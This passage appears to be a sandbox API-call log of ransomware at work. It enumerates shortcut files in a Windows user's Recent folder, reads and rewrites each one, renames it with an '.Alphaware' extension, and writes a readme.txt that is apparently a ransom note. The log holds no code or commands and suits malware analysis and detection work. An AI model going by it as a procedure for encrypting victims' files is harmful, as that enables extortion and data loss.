ftLastWriteTime.dwLowDateTime=0xd00799a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="xexTT Q3v7p50maSoJ5.lnk", cAlternateFileName="XEXTTQ~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf870f60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x22c, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.lnk", cAlternateFileName="XFJ_K_~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11bb920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZfG0gp1VfGWa8doIagS.ots.lnk", cAlternateFileName="XZFG0G~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1312580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="y- 0.lnk", cAlternateFileName="Y-0~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0301100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0301100, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjr9.lnk", cAlternateFileName="")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce7a1400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd148f340, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd148f340, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xd4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQlR.lnk", cAlternateFileName="")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1868, dwReserved0=0x0, dwReserved1=0x0, cFileName="YYaadTzVoXXESXd.lnk", cAlternateFileName="YYAADT~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15bfe40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.lnk", cAlternateFileName="")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1018a00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8zS.lnk", cAlternateFileName="")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11957c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZiOJla1 Q-SXSl2W5.lnk", cAlternateFileName="ZIOJLA~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13f6dc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13f6dc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13f6dc0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKwJY960tnphZx9R1d2d.lnk", cAlternateFileName="ZKWJY9~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd047dec0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd047dec0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd047dec0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="zOe1LTkImCuAAhrwbXf9.swf.lnk", cAlternateFileName="ZOE1LT~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08a8540, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08a8540, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd08a8540, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="zR 1JJINH15QPReboG.lnk", cAlternateFileName="ZR1JJI~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd040baa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x913, dwReserved0=0x0, dwReserved1=0x0, cFileName="zu2JIWj2WW.lnk", cAlternateFileName="ZU2JIW~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcef5db80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.lnk", cAlternateFileName="_7PBY2~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11957c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.lnk", cAlternateFileName="_AOXUB~1.LNK")) returned 1 [0094.471] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0094.472] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk", dwFileAttributes=0x80) returned 1 [0094.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24311d0 | out: lpFileInformation=0x24311d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb1e820, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb1e820, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2df)) returned 1 [0094.472] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.472] ReadFile (in: hFile=0x250, lpBuffer=0x2431780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2431780*, lpNumberOfBytesRead=0x23e958*=0x2df, lpOverlapped=0x0) returned 1 [0094.499] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb1e820, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a8629a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0094.501] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-Cj6mvIu4.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-cj6mviu4.lnk.alphaware")) returned 1 [0094.503] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.504] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk", dwFileAttributes=0x80) returned 1 [0094.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b5d70 | out: lpFileInformation=0x24b5d70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ec1da0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ec1da0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ec1da0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a8)) returned 1 [0094.505] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.505] ReadFile (in: hFile=0x250, lpBuffer=0x24b69e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b69e8*, lpNumberOfBytesRead=0x23e958*=0x9a8, lpOverlapped=0x0) returned 1 [0094.556] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.558] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ec1da0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ec1da0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a8faf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4)) returned 1 [0094.559] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-mBHtuQ4.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\-mbhtuq4.lnk.alphaware")) returned 1 [0094.560] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk", dwFileAttributes=0x80) returned 1 [0094.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x253bb28 | out: lpFileInformation=0x253bb28*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0d44fe0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d44fe0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d44fe0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e3)) returned 1 [0094.561] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.561] ReadFile (in: hFile=0x250, lpBuffer=0x253c240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x253c240*, lpNumberOfBytesRead=0x23e958*=0x3e3, lpOverlapped=0x0) returned 1 [0094.597] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.600] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d44fe0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d44fe0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a9471e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0094.600] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0kv--h785b9BKHr7X8.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\0kv--h785b9bkhr7x8.mkv.lnk.alphaware")) returned 1 [0094.601] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk", dwFileAttributes=0x80) returned 1 [0094.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25bd860 | out: lpFileInformation=0x25bd860*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cf8d20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x389)) returned 1 [0094.602] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.602] ReadFile (in: hFile=0x250, lpBuffer=0x25bdee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25bdee0*, lpNumberOfBytesRead=0x23e958*=0x389, lpOverlapped=0x0) returned 1 [0094.655] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a9df760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x588)) returned 1 [0094.657] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\15FGJM2GqTiMjPf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\15fgjm2gqtimjpf.lnk.alphaware")) returned 1 [0094.658] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk", dwFileAttributes=0x80) returned 1 [0094.659] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2456f98 | out: lpFileInformation=0x2456f98*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0d912a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d912a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d912a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0094.659] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.659] ReadFile (in: hFile=0x250, lpBuffer=0x2457600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2457600*, lpNumberOfBytesRead=0x23e958*=0x316, lpOverlapped=0x0) returned 1 [0094.703] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d912a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d912a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aa51b80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4)) returned 1 [0094.706] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1BM5 _1HkTZyXvgJAFgc.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1bm5 _1hktzyxvgjafgc.flv.lnk.alphaware")) returned 1 [0094.707] 